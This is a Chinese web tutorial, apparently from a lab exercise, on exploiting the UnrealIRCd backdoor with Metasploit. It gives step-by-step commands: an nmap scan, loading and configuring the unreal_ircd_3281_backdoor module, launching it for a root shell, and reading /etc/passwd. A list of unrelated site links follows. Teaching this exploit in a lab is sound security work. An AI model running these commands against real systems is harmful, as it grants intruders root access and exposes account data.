Metasploit溢出UnrealIRCd后门漏洞
发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,Metasploit溢出UnrealIRCd后门漏洞利用UnrealIRCd后门漏洞,获取目标主机的root权限。某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引
千家信息网最后更新 2025年01月21日Metasploit溢出UnrealIRCd后门漏洞
Metasploit溢出UnrealIRCd后门漏洞
利用UnrealIRCd后门漏洞,获取目标主机的root权限。
某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。
一、利用nmap工具扫描目标主机
1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择"在终端中打开"。
1.2在终端中输入命令"nmap -sV 192.168.1.3",对目标主机进行端口扫描,发现开放6667端口,对应的服务为unreal ircd。
1.3在终端中输入命令"msfconsole",启动MSF终端。
1.4在终端中输入命令"search unreal ircd",搜索ircd的相关工具和***载荷。
1.5在终端中输入命令"use exploit/unix/irc/unreal_ircd_3281_backdoor",启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6在终端中输入命令"show options",查看需要设置的相关项,"yes"表示必须填写的参数。
1.7在终端中输入命令"set RHOST 192.168.1.3",设置目标主机的IP地址。
1.8在终端中输入"exploit", 开始向目标主机***,***成功后,建立shell会话。
1.9在终端中输入"whoami",查看获得的权限为root,输入命令"cat /etc/passwd",查看系统的帐号和密码。
终端
输入
命令
主机
目标
漏洞
后门
代码
工具
权限
端口
提示
成功
参数
地址
密码
恶意
提示符
桌面
模块
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
阿里云的数据库备份
烟台中科网络技术有限公司
余姚优秀软件开发推荐
c 连接数据库远程配置
网络安全内容二年级
步进电机上位机软件开发流程
丽江创建网站java软件开发
美国的软件开发政策
软件开发业务流程图模板
南充卓立软件开发有限公司
我国发布网络安全审查办法
软件开发需求论证报告
安全生产单位数据库
linux 删库数据库
服务器机柜图片
手机如何登录公司内网服务器
如下哪一个代表数据库管理员
软件开发无领导面试
网络技术对人际交往的不利作用
网络安全宣传实践报告
网络安全责任制考核评价实施办法
南京联投网络技术
网络安全等级根据什么划分
简单http服务器
数据库的多线程并发访问技术
菏泽便民平台软件开发公司
网络安全著名院士
浪潮服务器网口插线没反应
深圳2011服务器散热器哪家好
桂阳学it软件开发工资